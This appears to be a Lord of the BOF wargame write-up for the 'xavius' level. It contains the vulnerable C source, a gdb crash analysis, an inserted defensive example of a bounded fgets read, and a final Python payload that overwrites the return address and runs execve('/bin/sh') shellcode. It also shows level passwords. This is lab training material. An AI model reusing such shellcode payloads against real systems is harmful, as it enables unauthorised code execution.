login : nightmare
password : beg for me
[nightmare@localhost nightmare]$ cat xavius.c
/*
    The Lord of the BOF : The Fellowship of the BOF
    - xavius
    - arg
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy, memcmp, memset */
#include <dumpcode.h>

int main()
{
    char buffer[40];
    char *ret_addr;

    // overflow! fgets reads up to 255 bytes into a 40-byte buffer
    fgets(buffer, 256, stdin);
    printf("%s\n", buffer);

    if(*(buffer+47) == '\xbf')
    {
        printf("stack retbayed you!\n");
        exit(0);
    }

    if(*(buffer+47) == '\x08')
    {
        printf("binary image retbayed you, too!!\n");
        exit(0);
    }

    // check if the ret_addr is library function or not
    memcpy(&ret_addr, buffer+44, 4);
    while(memcmp(ret_addr, "\x90\x90", 2) != 0)   // end point of function
    {
        if(*ret_addr == '\xc9'){                  // leave
            if(*(ret_addr+1) == '\xc3'){          // ret
                printf("You cannot use library function!\n");
                exit(0);
            }
        }
        ret_addr++;
    }

    // stack destroyer
    memset(buffer, 0, 44);
    memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

    // LD_* eraser
    // 40 : extra space for memset function
    memset(buffer-3000, 0, 3000-40);
}
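For contrast, here is the bounded read that removes the overflow in the listing above. This is an added example written for this write-up, not part of the challenge source: it reads at most 39 bytes into the same 40-byte buffer, drains the rest of an over-long line so it is neither written past the buffer nor left behind for the next read, and checks a guard pattern placed after the buffer. The helper names (read_line_bounded, make_sample, first_two_lines, demo) and the sample input of 256 'A's plus a second line are constructed here and assumed, not taken from the post.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same size as the challenge's `char buffer[40]` */

/* Bounded replacement for `fgets(buffer, 256, stdin)`: stores at most
 * cap-1 bytes plus the NUL, strips the trailing newline, and discards the
 * remainder of an over-long line. Returns bytes stored, or -1 on EOF. */
int read_line_bounded(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;   /* drain the bytes that would have overflowed */
    }
    return (int)len;
}

/* Constructed sample input (not from the post): the 256 'A's the write-up
 * feeds the binary, followed by a second line. Returns the byte count. */
size_t make_sample(char *dst, size_t dstcap)
{
    const char tail[] = "\nsecond line\n";
    size_t n = 256 + sizeof tail - 1;
    if (dstcap < n + 1) return 0;
    memset(dst, 'A', 256);
    memcpy(dst + 256, tail, sizeof tail);   /* copies the NUL too */
    return n;
}

/* Reads the sample through a memory-backed FILE into a frame that has a
 * guard pattern right after the 40-byte buffer. Returns the stored length
 * of the first line, -2 if the guard was overwritten, -1 on read failure;
 * the second line is copied into `second`. */
int first_two_lines(const char *payload, size_t payload_len,
                    char *second, size_t seccap)
{
    struct { char buf[BUF_SIZE]; unsigned char guard[8]; } f;
    memset(f.guard, 0xAA, sizeof f.guard);

    FILE *in = fmemopen((void *)payload, payload_len, "r");
    if (in == NULL) return -1;
    int n = read_line_bounded(f.buf, sizeof f.buf, in);
    int m = read_line_bounded(second, seccap, in);
    fclose(in);
    if (n < 0 || m < 0) return -1;

    for (size_t i = 0; i < sizeof f.guard; i++)
        if (f.guard[i] != 0xAA) return -2;
    return n;
}

/* Builds the sample, runs both reads, returns the first-line length. */
int demo(char *second, size_t seccap)
{
    char sample[300];
    size_t len = make_sample(sample, sizeof sample);
    if (len == 0) return -1;
    return first_two_lines(sample, len, second, seccap);
}

int demo_first_len(void)
{
    char s[BUF_SIZE];
    return demo(s, sizeof s);
}

int demo_second_equals(const char *expected)
{
    char s[BUF_SIZE];
    if (demo(s, sizeof s) < 0) return 0;
    return strcmp(s, expected) == 0;
}

int main(void)
{
    char second[BUF_SIZE];
    int n = demo(second, sizeof second);
    printf("first line stored %d bytes, second line = \"%s\"\n", n, second);
    return 0;
}
```

With the bounded read the 256-byte line is cut at 39 bytes, the guard after the buffer is untouched, and the leftover 'A's are drained instead of becoming the next line, which is exactly the behaviour the original `fgets(buffer, 256, stdin)` lacks.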
It is worth watching the fgets function closely.
There is a vulnerability in the fgets function.
First, since fgets reads 256 bytes, I made a file with Python to feed in 256 A's.
[nightmare@localhost nightmare]$ python -c 'print"A"*256' > A
[nightmare@localhost nightmare]$ ls
A test xavius xavius.c
[nightmare@localhost nightmare]$ cat a
cat: a: No such file or directory
[nightmare@localhost nightmare]$ cat A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[nightmare@localhost nightmare]$ gdb test
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r < A
Starting program: /home/nightmare/test < A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x40077f72 in memcmp () from /lib/libc.so.6
Let's analyze stdin with gdb.
First of all, a segmentation fault occurred.
We can see the input going in starting at 40015000.
It looks like putting shellcode here and running it should work.
Let's put in \x10\x50\x01\x40.
(python -c 'print "A" *44 + "\x10\x50\x01\x40" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"';cat)|./xavius
throw me away